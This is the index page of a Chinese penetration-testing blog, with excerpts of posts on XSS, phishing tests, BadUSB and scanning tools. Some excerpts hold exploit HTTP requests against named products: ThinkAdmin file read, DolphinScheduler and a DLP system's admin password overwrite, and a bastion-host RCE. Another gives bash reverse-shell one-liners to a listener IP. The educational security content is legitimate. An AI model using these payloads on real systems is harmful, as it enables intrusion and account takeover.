JE2Se ' Blog

  • Web安全
  • 移动安全
  • 应急响应
  • 安全工具
  • 实用技巧
  • 安全学习
  • Python应用
安全学习

《三娃为救爷爷大战蛇精,六娃偷看之不小心挖到了鹅厂的好多XSS》

漏洞来源于团队成员-子杰 文章想要火,标题一定要长,要吸引人~ 大家好,我是子杰,团队里面人都叫我XSS小王子。又是一个愉快的一天,前几天看了有一篇关于QQ邮箱的Self-XSS的文章,发现这个洞跟我之前挖的某个洞漏源头是一样的,所以也发出来分享一下。 事情是这样的,某日月黑风高,我正在被窝里面辛勤学习,正浏览在知识的海洋,一个CSDN的付费文件引起了我的兴趣。 奈何没有积分,故想到了某宝,在某宝上买了个CSDN文件代下载,然后点开QQ邮箱等卖家发货,看到自己昵称中的特殊字符变这样了,What?说好的个性独特的?怎…

2020年4月2日 0条评论 4135点热度 1人点赞 JE2Se 阅读全文
Python应用

[原创]AssetScan内网脆弱面分析工具

简介 分享个写的工具,关于内网漏洞检测的,我给它起了个听起来很牛皮的名字,AssetScan内网脆弱面分析工具(AS),糊弄糊弄人,哈哈。也不知道这个工具怎么样?希望它华而有实!(PS:我发现很多人再搞外网,一顿SSL报错,改了~) 仅个人之见,感觉这两年的红队比较火,不管是在招聘,项目,都在考察攻击人员的内网测试能力。后渗透,重要的一点为信息收集,有着一个较好的信息收集基础,能大大提高我们得测试效率,平时我们在内网中可能会依托一些已知工具进行信息收集,如Nmap去进行一些资产的探测,脆弱面的探测,但是效率非常的慢…

2019年11月29日 1条评论 3505点热度 6人点赞 JE2Se 阅读全文
Web安全

社工攻击-BadUSB攻防(全)

序言: 随着”网络强国战略”的实施,越来越多的企业着重网络安全的建设,企业在维护企业网络安全上煞费苦心,开发人员定期的进行安全开发培训,尽可能的减少在软件开发时期漏洞的产生,还通过添加硬件防火墙,入侵检测系统、防御系统等安全设备防御外部对企业的威胁,这些有效的手段即增强了企业网络的安全性,但是也导致现在的Web渗透测试难度越发提高。即使代码层面存在着高风险漏洞,但是由于安全设备的介入,仍给测试人员一头重击,导致了『无从下手』的尴尬处地。如果需要进一步的对目标进行安全检测,便只能在其它方面进行安全测试,比如社工攻击测…

2019年3月22日 0条评论 3303点热度 1人点赞 JE2Se 阅读全文
Web安全

我的兄弟叫顺溜之钓鱼社工测试以及企业安全防御

我妈说要吸引人注意,首先标题要够长~ 从小妈妈就孜孜不倦的教导我们要做一个诚实守信的好孩子,这么多年我也一直听妈妈的话。偶然的机会,我接触到了社会工程学测试的项目,社会工程学,欺骗的艺术,这是我首先映入脑帘的一个印象,难道我这么多年守身如玉的不撒谎好习惯要破?两为其难。后来还是说服了自己,心里为的是构造更安全更优质的互联网环境,舍我其谁~于是开始了社工测试的征程。测试的重点为企业的邮件安全,测试企业员工对钓鱼邮件的安全意识。 近年来的信息泄露事件有点多啊,黑色产业链锁着一个个利欲熏心的人。基于国内的监管以及对信息安…

2017年12月18日 1条评论 4583点热度 2人点赞 JE2Se 阅读全文
Web安全

HVV漏洞合集EXP3

一、ThinkAdminV6 任意文件操作 Update.php 三个函数未校验访问权限 目录遍历注意POST数据包rules参数值需要URL编码 POST /admin.html?s=admin/api.Update/node rules=%5B%22.%2F%22%5D 文件读取,后面那一串是UTF8字符串加密后的结果。计算方式在Update.php中的加密函数。 /admin.html?s=admin/api.Update/get/encode/ 34392q302x2r1b37382p382x2r1b1a1…

2020年9月17日 0条评论 2852点热度 3人点赞 JE2Se 阅读全文
Web安全

HVV漏洞合集EXP2

1、Apache DolphinScheduler权限覆盖漏洞[CVE-2020-13922] 大概就长这个样子 POST /dolphinscheduler/users/update id=1&userName=admin&userPassword=Password1!&tenantId=1&email=sdluser%40sdluser.sdluser&phone= 2、齐治堡垒机远程代码执行 POST /shterm/listener/tui_update.php a=…

2020年9月15日 0条评论 2668点热度 2人点赞 JE2Se 阅读全文
Web安全

HVV漏洞合集EXP

1、天融信数据防泄漏系统越权修改管理员密码 无需登录权限,由于修改密码处未校验原密码,且/?module=auth_user&action=mod_edit_pwd 接口未授权访问,造成直接修改任意用户密码。:默认superman账户uid为1。 POST /?module=auth_user&action=mod_edit_pwd Cookie: username=superman; uid=1&pd=Newpasswd&mod_pwd=1&dlp_perm=1 2、绿盟U…

2020年9月14日 0条评论 3929点热度 0人点赞 JE2Se 阅读全文
Web安全

反弹shell的几种方式总结

假设本机地址10.10.10.11,监听端口443。 1、Bash环境下反弹TCP协议shell 首先在本地监听TCP协议443端口 nc -lvp 443 然后在靶机上执行如下命令: bash -i >& /dev/tcp/10.10.10.11/443 0>&1 /bin/bash -i > /dev/tcp/10.10.10.11/443 0<& 2>&1 exec 5<>/dev/tcp/10.10.10.11/443;cat <…

2020年9月11日 1条评论 3317点热度 3人点赞 JE2Se 阅读全文
Web安全

Web源码泄露相关漏洞总结

总结了一些常见的web源码泄露漏洞,这些漏洞有的会泄露一些敏感的信息,会有意外的收获~

2020年9月11日 0条评论 2110点热度 1人点赞 JE2Se 阅读全文
Python应用

J2ExpSuite-漏洞利用框架(框)

一个以python3编写的的漏洞检测框架,可自定义,添加poc,exp 项目地址:https://github.com/JE2Se/J2ExpSuite 简单的写了一个框架,里面你的漏洞都没有集成,网络上有很多的poc,可以借鉴别人的POC轮子。我这里就不写了,只是把利用框架写出来。(如果大家想一起去维护这个工具,大家可以把编写好的POC右键发送给我,共同参与到项目中来,做一个好的工具.邮箱:admin@je2se.com) 先来几个截图看看工具样子 脚本启动的样子 脚本的功能菜单 运行截图 老样子,Windows…

2020年6月11日 0条评论 2724点热度 3人点赞 JE2Se 阅读全文
12345…16

JE2Se

半道出家安全行业,行业菜鸡~
喜好安全测试,安全开发
期待各位大佬的爱抚~

站内搜索
标签聚合
xss Web安全 神器 应急响应 BurpSuite badusb python wifi
最新 热点 随机
最新 热点 随机
HVV漏洞合集EXP3 HVV漏洞合集EXP2 HVV漏洞合集EXP 反弹shell的几种方式总结 Web源码泄露相关漏洞总结 J2ExpSuite-漏洞利用框架(框)
CSRF漏洞防御Ⅱ 安卓渗透测试 Ckecklist HVV漏洞合集EXP 应急响应 基础Ⅱ Windows CMD下开3389远程 XSS Payload 整理
最近评论
北木南 发布于 4 周前(04月22日) 大佬,收到消息了,回我一下
北木南 发布于 4 周前(04月22日) 请教下,这个则么用呀
666 发布于 3 个月前(02月09日) Great article.
念长辞 发布于 1 年前(12月15日) 大佬,这个还更新吗
sk001 发布于 2 年前(09月24日) :smile: 收藏了 嘿嘿
理想三旬-陈鸿宇
https://www.je2se.com/wp-content/uploads/2019/08/2019080401551329.mp3
友情链接
  • SecIN社区
  • VFsec Team
  • WaBUG
  • 云众可信
  • 子杰'Blog
  • 猎豹安全实验室
  • 阿峰‘Blog

COPYRIGHT © 2022 JE2Se ' Blog.

京ICP备17069779号-1